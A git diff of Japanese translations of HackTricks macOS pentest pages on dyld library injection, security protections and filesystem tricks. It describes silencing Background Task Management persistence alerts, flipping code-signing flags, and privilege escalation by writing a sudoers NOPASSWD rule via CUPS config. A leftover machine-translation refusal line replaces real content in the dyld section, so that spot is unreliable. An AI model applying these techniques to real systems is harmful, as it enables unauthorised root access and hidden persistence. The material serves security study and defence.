+> 注意してください。**`0x0(none)`** フラグで署名されたバイナリがあっても、実行時に **`CS_RESTRICT`** フラグが動的に設定される可能性があるため、この技術はそれらには適用できません。
 >
 > プロセスがこのフラグを持っているかどうかは、(get [**csops here**](https://github.com/axelexic/CSOps)) で確認できます:
 >
@@ -315,7 +317,7 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work
 > csops -status 
 > ```
 >
-> その後、フラグ 0x800 が有効になっているか確認してください。
+> その後、フラグ 0x800 が有効になっているかどうかを確認します。
 
 ## References
 
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
index ffeb0c42d..6064e30a8 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
@@ -4,26 +4,26 @@
 
 ## 基本情報
 
-Mach-o バイナリの実際の **エントリポイント** は動的にリンクされており、`LC_LOAD_DYLINKER` で定義されており、通常は `/usr/lib/dyld` です。
+Mach-o バイナリの実際の **entrypoint** は動的リンクされており、`LC_LOAD_DYLINKER` で定義されており、通常は `/usr/lib/dyld` です。
 
 このリンカーはすべての実行可能ライブラリを見つけ、メモリにマッピングし、すべての非遅延ライブラリをリンクする必要があります。このプロセスの後にのみ、バイナリのエントリポイントが実行されます。
 
 もちろん、**`dyld`** には依存関係はありません(syscalls と libSystem の抜粋を使用します)。
 
 > [!CAUTION]
-> このリンカーに脆弱性が含まれている場合、バイナリ(特権の高いものも含む)を実行する前に実行されるため、**特権昇格**が可能です。
+> このリンカーに脆弱性が含まれている場合、バイナリ(特権の高いものも含む)を実行する前に実行されるため、**特権昇格**が可能になります。
 
 ### フロー
 
 Dyld は **`dyldboostrap::start`** によってロードされ、**スタックカナリア** などのものもロードされます。これは、この関数が **`apple`** 引数ベクターにこのおよび他の **機密** **値** を受け取るためです。
 
-**`dyls::_main()`** は dyld のエントリポイントであり、最初のタスクは `configureProcessRestrictions()` を実行することです。これは通常、以下で説明されている **`DYLD_*`** 環境変数を制限します。
+**`dyls::_main()`** は dyld のエントリポイントであり、最初のタスクは `configureProcessRestrictions()` を実行することです。これは通常、以下で説明されている **`DYLD_*`** 環境変数を制限します:
 
 {{#ref}}
 ./
 {{#endref}}
 
-次に、dyld 共有キャッシュをマッピングし、すべての重要なシステムライブラリを事前リンクし、次にバイナリが依存するライブラリをマッピングし、すべての必要なライブラリがロードされるまで再帰的に続けます。したがって:
+次に、重要なシステムライブラリを事前リンクする dyld 共有キャッシュをマッピングし、バイナリが依存するライブラリをマッピングし、すべての必要なライブラリがロードされるまで再帰的に続けます。したがって:
 
 1. `DYLD_INSERT_LIBRARIES` で挿入されたライブラリのロードを開始します(許可されている場合)
 2. 次に、共有キャッシュされたもの
@@ -42,17 +42,17 @@ macOS のすべてのバイナリは動的にリンクされています。し
 
 - **`__TEXT.__[auth_]stubs`**: `__DATA` セクションからのポインタ
 - **`__TEXT.__stub_helper`**: 呼び出す関数に関する情報を持つ動的リンクを呼び出す小さなコード
-- **`__DATA.__[auth_]got`**: グローバルオフセットテーブル(インポートされた関数へのアドレス、解決されたとき、(ロード時にバインドされ、フラグ `S_NON_LAZY_SYMBOL_POINTERS` が付けられています)
-- **`__DATA.__nl_symbol_ptr`**: 非遅延シンボルポインタ(ロード時にバインドされ、フラグ `S_NON_LAZY_SYMBOL_POINTERS` が付けられています)
+- **`__DATA.__[auth_]got`**: グローバルオフセットテーブル(インポートされた関数へのアドレス、解決されたときに、ロード時にバインドされるため、フラグ `S_NON_LAZY_SYMBOL_POINTERS` が付けられています)
+- **`__DATA.__nl_symbol_ptr`**: 非遅延シンボルポインタ(ロード時にバインドされるため、フラグ `S_NON_LAZY_SYMBOL_POINTERS` が付けられています)
 - **`__DATA.__la_symbol_ptr`**: 遅延シンボルポインタ(最初のアクセス時にバインドされます)
 
 > [!WARNING]
-> "auth\_" プレフィックスの付いたポインタは、保護のためにプロセス内暗号化キーを使用しています(PAC)。さらに、arm64 命令 `BLRA[A/B]` を使用してポインタを確認することができます。そして、RETA\[A/B] は RET アドレスの代わりに使用できます。\
+> "auth\_" プレフィックスの付いたポインタは、保護のためにプロセス内暗号化キーを使用しています(PAC)。さらに、ポインタを追跡する前に検証するために arm64 命令 `BLRA[A/B]` を使用することが可能です。そして、RETA\[A/B] は RET アドレスの代わりに使用できます。\
 > 実際、**`__TEXT.__auth_stubs`** 内のコードは、ポインタを認証するために要求された関数を呼び出すために **`braa`** を使用します。
 >
-> また、現在の dyld バージョンは **すべてを非遅延としてロード** します。
+> また、現在の dyld バージョンは **すべてを非遅延** としてロードします。
 
-### 遅延シンボルの検索
+### 遅延シンボルの発見
 ```c
 //gcc load.c -o load
 #include 
@@ -68,7 +68,7 @@ printf("Hi\n");
 100003f80: 913e9000    	add	x0, x0, #4004
 100003f84: 94000005    	bl	0x100003f98 <_printf+0x100003f98>
 ```
-`printf`を呼び出すためのジャンプが**`__TEXT.__stubs`**に向かっていることがわかります。
+`printf`へのジャンプが**`__TEXT.__stubs`**に向かっていることがわかります:
 ```bash
 objdump --section-headers ./load
 
@@ -97,7 +97,7 @@ Disassembly of section __TEXT,__stubs:
 ```
 あなたは**GOTのアドレスにジャンプしている**ことがわかります。この場合、非遅延で解決され、printf関数のアドレスが含まれます。
 
-他の状況では、直接GOTにジャンプする代わりに、**`__DATA.__la_symbol_ptr`**にジャンプすることがあり、これは読み込もうとしている関数を表す値をロードし、その後**`__TEXT.__stub_helper`**にジャンプします。これが**`__DATA.__nl_symbol_ptr`**にジャンプし、**`dyld_stub_binder`**のアドレスを含んでいます。この関数は、関数の番号とアドレスをパラメータとして受け取ります。\
+他の状況では、GOTに直接ジャンプする代わりに、**`__DATA.__la_symbol_ptr`**にジャンプすることがあり、これは読み込もうとしている関数を表す値をロードし、その後**`__TEXT.__stub_helper`**にジャンプします。これは**`__DATA.__nl_symbol_ptr`**にジャンプし、ここには**`dyld_stub_binder`**のアドレスが含まれています。この関数は、関数の番号とアドレスをパラメータとして受け取ります。\
 この最後の関数は、検索された関数のアドレスを見つけた後、それを**`__TEXT.__stub_helper`**の対応する位置に書き込み、将来のルックアップを避けます。
 
 > [!TIP]
@@ -119,7 +119,7 @@ for (int i=0; apple[i]; i++)
 printf("%d: %s\n", i, apple[i])
 }
 ```
-I'm sorry, but I cannot provide a translation without the specific text you would like translated. Please provide the relevant English text, and I will translate it to Japanese as per your guidelines.
+I'm sorry, but I cannot provide a translation without the specific text you would like me to translate. Please provide the relevant English text, and I will translate it to Japanese as per your guidelines.
 ```
 0: executable_path=./a
 1:
@@ -137,7 +137,7 @@ I'm sorry, but I cannot provide a translation without the specific text you woul
 > [!TIP]
 > これらの値がメイン関数に到達する時点で、機密情報はすでに削除されているか、データ漏洩が発生している可能性があります。
 
-メインに入る前にデバッグしてこれらの興味深い値を確認することができます:
+メインに入る前にデバッグでこれらの興味深い値をすべて見ることができます:
 
 
lldb ./apple
 
@@ -180,7 +180,7 @@ I'm sorry, but I cannot provide a translation without the specific text you woul
 
 ## dyld_all_image_infos
 
-これは、dyldの状態に関する情報を持つ構造体で、[**ソースコード**](https://opensource.apple.com/source/dyld/dyld-852.2/include/mach-o/dyld_images.h.auto.html)で見つけることができ、バージョン、dyld_image_info配列へのポインタ、dyld_image_notifier、プロセスが共有キャッシュから切り離されているかどうか、libSystem初期化子が呼び出されたかどうか、dyls自身のMachヘッダーへのポインタ、dyldバージョン文字列へのポインタなどの情報が含まれています。
+これは、dyldの状態に関する情報を含む構造体で、[**ソースコード**](https://opensource.apple.com/source/dyld/dyld-852.2/include/mach-o/dyld_images.h.auto.html)で見つけることができ、バージョン、dyld_image_info配列へのポインタ、dyld_image_notifierへのポインタ、プロセスが共有キャッシュから切り離されているかどうか、libSystem初期化子が呼び出されたかどうか、dyls自身のMachヘッダーへのポインタ、dyldバージョン文字列へのポインタなどの情報が含まれています。
 
 ## dyld 環境変数
 
@@ -190,7 +190,7 @@ dyldが何をしているのかを理解するのに役立つ興味深い環境
 
 - **DYLD_PRINT_LIBRARIES**
 
-読み込まれている各ライブラリを確認します:
+読み込まれた各ライブラリを確認します:
 ```
 DYLD_PRINT_LIBRARIES=1 ./apple
 dyld[19948]: <9F848759-9AB8-3BD2-96A1-C069DC1FFD43> /private/tmp/a
@@ -208,7 +208,7 @@ dyld[19948]: <1A7038EC-EE49-35AE-8A3C-C311083795FB> /usr/lib/system/libmacho.dyl
 ```
 - **DYLD_PRINT_SEGMENTS**
 
-各ライブラリがどのように読み込まれているかを確認します:
+各ライブラリがどのようにロードされるかを確認します:
 ```
 DYLD_PRINT_SEGMENTS=1 ./apple
 dyld[21147]: re-using existing shared cache (/System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e):
@@ -264,7 +264,7 @@ dyld[21623]: running initializer 0x18e59e5c0 in /usr/lib/libSystem.B.dylib
 - `DYLD_PRINT_BINDINGS`: バインドされたときにシンボルを印刷する
 - `DYLD_WEAK_BINDINGS`: バインドされたときに弱いシンボルのみを印刷する
 - `DYLD_PRINT_CODE_SIGNATURES`: コード署名登録操作を印刷する
-- `DYLD_PRINT_DOFS`: 読み込まれた D-Trace オブジェクトフォーマットセクションを印刷する
+- `DYLD_PRINT_DOFS`: 読み込まれた D-Trace オブジェクト形式セクションを印刷する
 - `DYLD_PRINT_ENV`: dyld によって見られた環境を印刷する
 - `DYLD_PRINT_INTERPOSTING`: インターポスティング操作を印刷する
 - `DYLD_PRINT_LIBRARIES`: 読み込まれたライブラリを印刷する
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
index 336e07d67..335065123 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
@@ -1,4 +1,4 @@
-# macOS セキュリティ保護
+# macOS Security Protections
 
 {{#include ../../../banners/hacktricks-training.md}}
 
@@ -6,47 +6,52 @@
 
 Gatekeeperは通常、**Quarantine + Gatekeeper + XProtect**の組み合わせを指し、これはユーザーが**潜在的に悪意のあるソフトウェアを実行するのを防ぐ**ために試みる3つのmacOSセキュリティモジュールです。
 
-詳細情報は以下にあります:
+詳細情報は以下にあります:
+
 
 {{#ref}}
 macos-gatekeeper.md
 {{#endref}}
 
-## プロセス制限
+## Processes Limitants
 
 ### MACF
 
-### SIP - システム整合性保護
+### SIP - System Integrity Protection
+
 
 {{#ref}}
 macos-sip.md
 {{#endref}}
 
-### サンドボックス
+### Sandbox
+
+MacOS Sandboxは、サンドボックス内で実行されるアプリケーションを、アプリが実行されている**Sandboxプロファイルで指定された許可されたアクション**に制限します。これにより、**アプリケーションが期待されるリソースのみをアクセスすることが保証されます**。
 
-MacOSサンドボックスは、サンドボックス内で実行されるアプリケーションを、アプリが実行されている**サンドボックスプロファイルで指定された許可されたアクション**に制限します。これにより、**アプリケーションが期待されるリソースのみをアクセスすることが保証されます**。
 
 {{#ref}}
 macos-sandbox/
 {{#endref}}
 
-### TCC - **透明性、同意、制御**
+### TCC - **Transparency, Consent, and Control**
+
+**TCC (Transparency, Consent, and Control)**はセキュリティフレームワークです。これは、アプリケーションの**権限を管理する**ために設計されており、特に機密機能へのアクセスを規制します。これには、**位置情報サービス、連絡先、写真、マイク、カメラ、アクセシビリティ、フルディスクアクセス**などの要素が含まれます。TCCは、アプリが明示的なユーザーの同意を得た後にのみこれらの機能にアクセスできるようにし、プライバシーと個人データに対する制御を強化します。
 
-**TCC (透明性、同意、制御)**はセキュリティフレームワークです。これは、アプリケーションの**権限を管理する**ために設計されており、特に機密機能へのアクセスを規制します。これには、**位置情報サービス、連絡先、写真、マイク、カメラ、アクセシビリティ、フルディスクアクセス**などの要素が含まれます。TCCは、アプリが明示的なユーザーの同意を得た後にのみこれらの機能にアクセスできることを保証し、プライバシーと個人データに対する制御を強化します。
 
 {{#ref}}
 macos-tcc/
 {{#endref}}
 
-### 起動/環境制約と信頼キャッシュ
+### Launch/Environment Constraints & Trust Cache
 
 macOSの起動制約は、**プロセスの開始を規制する**ためのセキュリティ機能であり、**誰がプロセスを起動できるか、どのように、どこから**起動するかを定義します。macOS Venturaで導入され、システムバイナリを**信頼キャッシュ**内の制約カテゴリに分類します。すべての実行可能バイナリには、**自己、親、責任**の制約を含む**起動**のための**ルール**が設定されています。macOS Sonomaでは、これらの機能が**環境**制約としてサードパーティアプリに拡張され、プロセスの起動条件を管理することで潜在的なシステムの悪用を軽減します。
 
+
 {{#ref}}
 macos-launch-environment-constraints.md
 {{#endref}}
 
-## MRT - マルウェア除去ツール
+## MRT - Malware Removal Tool
 
 マルウェア除去ツール(MRT)は、macOSのセキュリティインフラストラクチャの一部です。名前が示すように、MRTの主な機能は**感染したシステムから既知のマルウェアを除去する**ことです。
 
@@ -54,14 +59,22 @@ macos-launch-environment-constraints.md
 
 XProtectとMRTはどちらもmacOSのセキュリティ対策の一部ですが、異なる機能を果たします:
 
-- **XProtect**は予防ツールです。これは、**ファイルがダウンロードされる際にチェック**し、既知のマルウェアのタイプが検出されると、**ファイルのオープンを防ぎ**、その結果、マルウェアがシステムに感染するのを防ぎます。
-- **MRT**は、逆に、**反応ツール**です。これは、システム上でマルウェアが検出された後に動作し、問題のあるソフトウェアを除去してシステムをクリーンにすることを目的としています。
+- **XProtect**は予防的なツールです。これは、**ファイルがダウンロードされる際にチェック**し、既知のマルウェアのタイプが検出されると、**ファイルのオープンを防ぎ**、マルウェアがシステムに感染するのを防ぎます。
+- **MRT**は、逆に、**反応的なツール**です。これは、システム上でマルウェアが検出された後に動作し、問題のあるソフトウェアを除去してシステムをクリーンにすることを目的としています。
 
 MRTアプリケーションは**`/Library/Apple/System/Library/CoreServices/MRT.app`**にあります。
 
-## バックグラウンドタスク管理
+## Background Tasks Management
 
-**macOS**は、ツールが**コード実行を持続させるためのよく知られた技術を
+**macOS**は、ツールが**コード実行を持続させるためのよく知られた技術**(ログイン項目、デーモンなど)を使用するたびに**警告**を出すようになり、ユーザーは**どのソフトウェアが持続しているか**をよりよく知ることができます。
+
+

+
+これは、`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/backgroundtaskmanagementd`にある**デーモン**と、`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Support/BackgroundTaskManagementAgent.app`にある**エージェント**によって実行されます。
+
+**`backgroundtaskmanagementd`**が何かが持続的なフォルダにインストールされていることを知る方法は、**FSEventsを取得し**、それらのための**ハンドラー**を作成することです。
+
+さらに、Appleが管理する**よく知られたアプリケーション**を含むplistファイルがあり、場所は`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/attributions.plist`です。
 ```json
 [...]
 "us.zoom.ZoomDaemon" => {
@@ -77,14 +90,14 @@ MRTアプリケーションは**`/Library/Apple/System/Library/CoreServices/MRT.
 }
 [...]
 ```
-### 列挙
+### Enumeration
 
-AppleのCLIツールを使用して、構成されたすべてのバックグラウンドアイテムを**列挙**することができます:
+AppleのCLIツールを使用して、構成されたすべてのバックグラウンドアイテムを**列挙**することが可能です:
 ```bash
 # The tool will always ask for the users password
 sfltool dumpbtm
 ```
-さらに、この情報を[**DumpBTM**](https://github.com/objective-see/DumpBTM)を使ってリストすることも可能です。
+さらに、この情報を[**DumpBTM**](https://github.com/objective-see/DumpBTM)を使用してリストすることも可能です。
 ```bash
 # You need to grant the Terminal Full Disk Access for this to work
 chmod +x dumpBTM
@@ -95,15 +108,15 @@ xattr -rc dumpBTM # Remove quarantine attr
 
 ### BTM の操作
 
-新しい永続性が見つかると、**`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`** タイプのイベントが発生します。したがって、この **イベント** が送信されるのを **防ぐ** 方法や、**エージェントがユーザーに警告するのを防ぐ** 方法は、攻撃者が BTM を _**回避**_ するのに役立ちます。
+新しい永続性が見つかると、**`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`** タイプのイベントが発生します。したがって、この **イベント** が送信されるのを **防ぐ** 方法や、**エージェントがユーザーに警告するのを防ぐ** 方法は、攻撃者が BTM を _**バイパス**_ するのに役立ちます。
 
-- **データベースのリセット**: 次のコマンドを実行すると、データベースがリセットされます(最初から再構築する必要があります)。ただし、何らかの理由で、これを実行した後は **システムが再起動されるまで新しい永続性は警告されません**。
+- **データベースのリセット**: 次のコマンドを実行すると、データベースがリセットされます(ゼロから再構築されるべきです)。ただし、何らかの理由で、これを実行した後は **システムが再起動されるまで新しい永続性は警告されません**。
 - **root** が必要です。
 ```bash
 # Reset the database
 sfltool resettbtm
 ```
-- **エージェントを停止する**: 新しい検出が見つかったときに**ユーザーに警告しない**ように、エージェントに停止信号を送ることが可能です。
+- **エージェントを停止する**: エージェントに停止信号を送信することで、**新しい検出が見つかったときにユーザーに警告しない**ようにすることができます。
 ```bash
 # Get PID
 pgrep BackgroundTaskManagementAgent
@@ -118,7 +131,7 @@ T
 ```
 - **バグ**: **永続性を作成したプロセスがそれのすぐ後に存在する場合**、デーモンはそれについて**情報を取得しようとし**、**失敗し**、**新しいものが永続していることを示すイベントを送信できなくなります**。
 
-参照および**BTMに関する詳細情報**:
+BTMに関する参考文献と**詳細情報**:
 
 - [https://youtu.be/9hjUmT031tc?t=26481](https://youtu.be/9hjUmT031tc?t=26481)
 - [https://www.patreon.com/posts/new-developer-77420730?l=fr](https://www.patreon.com/posts/new-developer-77420730?l=fr)
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
index 25de6625c..1fe365a4b 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
@@ -8,9 +8,9 @@
 
 - **read** - ディレクトリエントリを**列挙**できます
 - **write** - ディレクトリ内の**ファイル**を**削除/作成**でき、**空のフォルダ**を**削除**できます。
-- ただし、**書き込み権限**がない限り、**非空のフォルダ**を削除/変更することはできません。
+- しかし、**書き込み権限**がない限り、**非空のフォルダ**を削除/変更することはできません。
 - **フォルダの名前を変更**することは、そのフォルダを所有していない限りできません。
-- **execute** - ディレクトリを**横断することが許可**されています。この権利がないと、その中のファイルやサブディレクトリにアクセスできません。
+- **execute** - ディレクトリを**横断することが許可**されています - この権利がないと、その中のファイルやサブディレクトリにアクセスできません。
 
 ### Dangerous Combinations
 
@@ -24,7 +24,7 @@
 
 ### Folder root R+X Special case
 
-**rootのみがR+Xアクセスを持つ**ディレクトリ内にファイルがある場合、それらは**他の誰にもアクセスできません**。したがって、**制限**のためにユーザーが読み取れない**ファイルを**このフォルダから**別のフォルダに移動**できる脆弱性は、これらのファイルを読むために悪用される可能性があります。
+**rootのみがR+Xアクセス**を持つ**ディレクトリ**内にファイルがある場合、それらは**他の誰にもアクセスできません**。したがって、**制限**のためにユーザーが読み取れない**ファイルを**このフォルダから**別のフォルダに移動**できる脆弱性は、これらのファイルを読むために悪用される可能性があります。
 
 例: [https://theevilbit.github.io/posts/exploiting_directory_permissions_on_macos/#nix-directory-permissions](https://theevilbit.github.io/posts/exploiting_directory_permissions_on_macos/#nix-directory-permissions)
 
@@ -32,13 +32,13 @@
 
 ### Permissive file/folder
 
-特権プロセスが**低特権ユーザー**によって**制御される**可能性のある**ファイル**にデータを書き込んでいる場合、または低特権ユーザーによって**以前に作成された**可能性がある場合、そのユーザーはシンボリックまたはハードリンクを介して**別のファイルを指す**ことができ、特権プロセスはそのファイルに書き込みます。
+特権プロセスが**低特権ユーザー**によって**制御**される可能性のある**ファイル**にデータを書き込んでいる場合、または低特権ユーザーによって**以前に作成**されたものである場合、そのユーザーはシンボリックまたはハードリンクを介して**別のファイルを指す**ことができ、特権プロセスはそのファイルに書き込みます。
 
 攻撃者が**特権を昇格させるために任意の書き込みを悪用できる**他のセクションを確認してください。
 
 ### Open `O_NOFOLLOW`
 
-関数`open`で使用されるフラグ`O_NOFOLLOW`は、最後のパスコンポーネントでシンボリックリンクを追跡しませんが、パスの残りの部分は追跡します。パス内のシンボリックリンクを追跡しない正しい方法は、フラグ`O_NOFOLLOW_ANY`を使用することです。
+関数`open`で使用されるフラグ`O_NOFOLLOW`は、最後のパスコンポーネントでシンボリックリンクを追跡しませんが、パスの残りの部分は追跡します。パス内のシンボリックリンクを追跡しないようにする正しい方法は、フラグ`O_NOFOLLOW_ANY`を使用することです。
 
 ## .fileloc
 
@@ -60,9 +60,9 @@
 
 ### FDの漏洩(`O_CLOEXEC`なし)
 
-`open`への呼び出しに`O_CLOEXEC`フラグがない場合、ファイルディスクリプタは子プロセスによって継承されます。したがって、特権プロセスが特権ファイルを開き、攻撃者が制御するプロセスを実行すると、攻撃者は**特権ファイルに対するFDを継承します**。
+`open`への呼び出しにフラグ`O_CLOEXEC`がない場合、ファイルディスクリプタは子プロセスによって継承されます。したがって、特権プロセスが特権ファイルを開き、攻撃者が制御するプロセスを実行すると、攻撃者は**特権ファイルに対するFDを継承します**。
 
-**高い特権でファイルまたはフォルダを開くプロセスを作成できる場合**、**`crontab`**を悪用して、**`EDITOR=exploit.py`**で`/etc/sudoers.d`内のファイルを開くことができます。これにより、`exploit.py`は`/etc/sudoers`内のファイルへのFDを取得し、それを悪用します。
+**高い特権でファイルまたはフォルダを開くプロセスを作成できる場合**、**`crontab`**を悪用して、**`EDITOR=exploit.py`**で`/etc/sudoers.d`内のファイルを開くことができ、`exploit.py`は`/etc/sudoers`内のファイルへのFDを取得し、それを悪用します。
 
 例えば: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)、コード: https://github.com/gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging
 
@@ -84,7 +84,7 @@ xattr: [Errno 1] Operation not permitted: '/tmp/asd'
 ls -lO /tmp/asd
 # check the "uchg" in the output
 ```
-### defvfs マウント
+### defvfs mount
 
 **devfs** マウントは **xattr** をサポートしていません。詳細は [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html) を参照してください。
 ```bash
@@ -120,13 +120,13 @@ ls -le /tmp/test
 ```
 ### **com.apple.acl.text xattr + AppleDouble**
 
-**AppleDouble**ファイル形式は、ファイルとそのACEを含むコピーを作成します。
+**AppleDouble** ファイル形式は、ファイルとその ACE を含むコピーを作成します。
 
-[**ソースコード**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html)を見ると、xattrの中に保存されているACLのテキスト表現である**`com.apple.acl.text`**が、解凍されたファイルのACLとして設定されることがわかります。したがって、ACLが他のxattrsの書き込みを防ぐように設定されたアプリケーションを**AppleDouble**ファイル形式のzipファイルに圧縮した場合... クアランティンxattrはアプリケーションに設定されませんでした:
+[**ソースコード**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) では、xattr の中に保存されている ACL テキスト表現が **`com.apple.acl.text`** と呼ばれ、解凍されたファイルの ACL として設定されることがわかります。したがって、他の xattrs の書き込みを防ぐ ACL を持つ **AppleDouble** ファイル形式の zip ファイルにアプリケーションを圧縮した場合... 検疫 xattr はアプリケーションに設定されませんでした:
 
-詳細については[**元の報告**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/)を確認してください。
+詳細については、[**元の報告**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) を確認してください。
 
-これを再現するには、まず正しいacl文字列を取得する必要があります:
+これを再現するには、まず正しい acl 文字列を取得する必要があります:
 ```bash
 # Everything will be happening here
 mkdir /tmp/temp_xattrs
@@ -158,7 +158,7 @@ macos-xattr-acls-extra-stuff.md
 
 一部のセキュリティチェックは、バイナリが**プラットフォームバイナリ**であるかどうかを確認します。たとえば、XPCサービスに接続を許可するためです。しかし、https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/で示されているように、プラットフォームバイナリ(例:/bin/ls)を取得し、環境変数`DYLD_INSERT_LIBRARIES`を使用してdyld経由でエクスプロイトを注入することで、このチェックをバイパスすることが可能です。
 
-### フラグ`CS_REQUIRE_LV`と`CS_FORCED_LV`のバイパス
+### フラグ`CS_REQUIRE_LV`および`CS_FORCED_LV`のバイパス
 
 実行中のバイナリが自分自身のフラグを変更してチェックをバイパスすることが可能です。コードは次のようになります:
 ```c
@@ -173,7 +173,7 @@ csops(pid, 9, &status, 4); // CS_OPS_SET_STATUS
 status = SecTaskGetCodeSignStatus(SecTaskCreateFromSelf(0));
 NSLog(@"=====Inject successfully into %d(%@), csflags=0x%x", pid, exePath, status);
 ```
-## バイパスコード署名
+## コード署名のバイパス
 
 バンドルには、**`_CodeSignature/CodeResources`** というファイルが含まれており、これは **バンドル** 内のすべての **ファイル** の **ハッシュ** を含んでいます。CodeResources のハッシュは **実行可能ファイル** にも **埋め込まれている** ため、それをいじることはできません。
 
@@ -221,13 +221,13 @@ NSLog(@"=====Inject successfully into %d(%@), csflags=0x%x", pid, exePath, statu
 ...
 
 ```
-リソースの署名をCLIから計算することが可能です:
+CLIからリソースの署名を計算することができます:
 ```bash
 openssl dgst -binary -sha1 /System/Cryptexes/App/System/Applications/Safari.app/Contents/Resources/AppIcon.icns | openssl base64
 ```
 ## Mount dmgs
 
-ユーザーは、既存のフォルダーの上に作成されたカスタムdmgをマウントできます。これが、カスタムコンテンツを含むカスタムdmgパッケージを作成する方法です:
+ユーザーは、既存のフォルダーの上にカスタムで作成されたdmgをマウントできます。これが、カスタムコンテンツを含むカスタムdmgパッケージを作成する方法です:
 ```bash
 # Create the volume
 hdiutil create /private/tmp/tmp.dmg -size 2m -ov -volname CustomVolName -fs APFS 1>/dev/null
@@ -248,20 +248,20 @@ hdiutil detach /private/tmp/mnt 1>/dev/null
 # You can also create a dmg from an app using:
 hdiutil create -srcfolder justsome.app justsome.dmg
 ```
-通常、macOSは`com.apple.DiskArbitrarion.diskarbitrariond` Machサービス(`/usr/libexec/diskarbitrationd`によって提供される)と通信してディスクをマウントします。LaunchDaemons plistファイルに`-d`パラメータを追加して再起動すると、`/var/log/diskarbitrationd.log`にログを保存します。\
+通常、macOSは`com.apple.DiskArbitrarion.diskarbitrariond` Machサービス(`/usr/libexec/diskarbitrationd`によって提供される)と通信してディスクをマウントします。LaunchDaemons plistファイルに`-d`パラメータを追加して再起動すると、`/var/log/diskarbitrationd.log`にログが保存されます。\
 ただし、`hdik`や`hdiutil`のようなツールを使用して、`com.apple.driver.DiskImages` kextと直接通信することも可能です。
 
 ## 任意の書き込み
 
-### 定期的なシェルスクリプト
+### 定期的なshスクリプト
 
 あなたのスクリプトが**シェルスクリプト**として解釈される場合、毎日トリガーされる**`/etc/periodic/daily/999.local`**シェルスクリプトを上書きすることができます。
 
-このスクリプトの実行を**偽装**するには、**`sudo periodic daily`**を使用できます。
+このスクリプトの実行を**偽装**することができます:**`sudo periodic daily`**
 
 ### デーモン
 
-任意の**LaunchDaemon**を作成します。例えば、**`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`**のように、任意のスクリプトを実行するplistを作成します。
+任意のスクリプトを実行するplistを持つ任意の**LaunchDaemon**を作成します。例えば、**`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`**のように:
 ```xml
 
 
@@ -300,19 +300,19 @@ ErrorLog /etc/sudoers.d/lpe
 LogFilePerm 777
 
 ```
-この操作により、パーミッションが777のファイル`/etc/sudoers.d/lpe`が作成されます。最後の余分なゴミはエラーログの作成をトリガーするためのものです。
+これは、パーミッション777で`/etc/sudoers.d/lpe`というファイルを作成します。最後の余分なゴミは、エラーログの作成をトリガーするためのものです。
 
-次に、`/etc/sudoers.d/lpe`に特権を昇格させるために必要な設定を記述します。例えば、`%staff ALL=(ALL) NOPASSWD:ALL`のようにします。
+次に、`/etc/sudoers.d/lpe`に、特権を昇格させるために必要な設定を記述します。例えば、`%staff ALL=(ALL) NOPASSWD:ALL`のようにします。
 
-その後、再度`/etc/cups/cups-files.conf`ファイルを修正し、`LogFilePerm 700`を指定して、新しいsudoersファイルが`cupsctl`を呼び出すことで有効になるようにします。
+その後、`/etc/cups/cups-files.conf`ファイルを再度修正し、`LogFilePerm 700`を指定して、新しいsudoersファイルが`cupsctl`を呼び出すことで有効になるようにします。
 
 ### サンドボックスエスケープ
 
-FSの任意の書き込みを使用してmacOSサンドボックスをエスケープすることが可能です。いくつかの例については、ページ[macOS Auto Start](../../../../macos-auto-start-locations.md)を確認してください。ただし、一般的な方法は、`~/Library/Preferences/com.apple.Terminal.plist`にターミナルの設定ファイルを書き込み、起動時にコマンドを実行するようにして`open`を使用して呼び出すことです。
+macOSのサンドボックスをFSの任意の書き込みでエスケープすることが可能です。いくつかの例については、ページ[macOS Auto Start](../../../../macos-auto-start-locations.md)を確認してください。ただし、一般的な方法は、`~/Library/Preferences/com.apple.Terminal.plist`にターミナルの設定ファイルを書き込み、起動時にコマンドを実行するようにして、`open`を使用して呼び出すことです。
 
 ## 他のユーザーとして書き込み可能なファイルを生成する
 
